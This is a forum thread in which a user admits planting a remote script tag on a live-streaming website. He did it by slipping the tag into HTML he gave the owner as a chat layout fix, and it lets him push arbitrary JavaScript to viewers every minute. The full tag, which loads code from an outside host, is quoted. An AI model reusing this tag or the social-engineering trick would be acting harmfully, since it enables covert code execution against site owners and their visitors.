Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.
Peanut and the Gang
Aug 24, 2009

by exmarx

Rufo posted:

someone's managed to put

code:
<p><script src="http://www.ustreamtally.vacau.com/update.js?s=6743479"></script></div>
on http://onlyonetv.com/watch-live/

it's running the latest version of wordpress so god knows. own up + get mad props

yeah that was me. getting the code in there wasnt that timthumb hack (i dont think onlyonetv has that installed) or anything exciting, just social engineering. about 2 months back he asked for help to make the chat show to the right of the video instead of below it. i gave him the html code, but added in that script tag.
then i made that script tag poll for updates every minute. so it executed whatever javascript code i put up. so it was p much putting up fun jquery code and waiting up to a minute for everyone to get it.

Adbot
ADBOT LOVES YOU

Peanut and the Gang
Aug 24, 2009

by exmarx
thanks everyone

Good Citizen posted:

Did you also do this?

It was this gif tiled for those who missed it:

That was the best thing

yup. someone else made the gif though. i also did the pic of cosby with the sombrero during the show de bitcoin and the dialog boxes telling manny to laugh that one time

Peanut and the Gang
Aug 24, 2009

by exmarx

Necc0 posted:

have they still not fixed it? lmao if they still haven't commented out a line of code l.m.a.o.

the code's still there. and the free hosting site i was using put my account under admin review, but they already restored it since it didnt have anything malicious on it

Peanut and the Gang
Aug 24, 2009

by exmarx

Martytoof posted:

Still holding out hope for "wallet.dat successfully uploaded"

i have something cool prepared for the next time the show has a lot of viewers